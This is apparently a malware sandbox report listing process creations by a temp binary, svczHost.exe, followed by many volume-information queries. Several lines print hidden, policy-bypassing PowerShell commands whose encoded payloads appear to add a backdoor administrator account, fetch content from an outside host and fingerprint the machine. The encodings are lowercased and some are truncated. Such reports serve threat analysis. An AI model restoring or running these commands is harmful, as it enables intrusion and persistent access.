        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8amwa3aguamgbhaduanwa2adcaoaaxagyangawaguayqblageanqa1aguamwa3adkaygbladyayqbladaamaa3adcanga0adeaygazadkazga1adkamaa3adkamga0agqaoaa1adianaayadqamqbladiaoqbiadcayqa1admayqa2adeamwbiadmazaazadcazga5adaazqawadaanqbladeamqbiadkangbkadyamqaxadcangayadkamaa0adyaoqa5adaaywaxagqazga3adkayqbhadkanwazaduamga4adkamwawadgaywaxagiamgbmageaoqblagqazqblageanabkagmanqbmaguanqbhadaaoqbiagyaoqbiadianwa3admazqblageazga5adaaoqa1adaayga2adkangbmaguamqawagmaywa5agqaygazadcanaa1agianqaxaduamqbladqaygawadaamabhadcaoqaxadiamqazagmazga5admazgayaduamaa3adaazga1adgaoqbiadqamabmagqamwbladmaoqbjadqayqaxadgazqbkageazaayaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagadJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8amwa3aguamgbhaduanwa2adcaoaaxagyangawaguayqblageanqa1aguamwa3adkaygbladyayqbladaamaa3adcanga0adeaygazadkazga1adkamaa3adkamga0agqaoaa1adianaayadqamqbladiaoqbiadcayqa1admayqa2adeamwbiadmazaazadcazga5adaazqawadaanqbladeamqbiadkangbkadyamqaxadcangayadkamaa0adyaoqa5adaaywaxagqazga3adkayqbhadkanwazaduamga4adkamwawadgaywaxagiamgbmageaoqblagqazqblageanabkagmanqbmaguanqbhadaaoqbiagyaoqbiadianwa3admazqblageazga5adaaoqa1adaayga2adkangbmaguamqawagmaywa5agqaygazadcanaa1agianqaxaduamqbladqaygawadaamabhadcaoqaxadiamqazagmazga5admazgayaduamaa3adaazga1adgaoqbiadqamabmagqamwbladmaoqbjadqayqaxadgazqbkageazaayaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad0aiaawadsaiaakagJump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
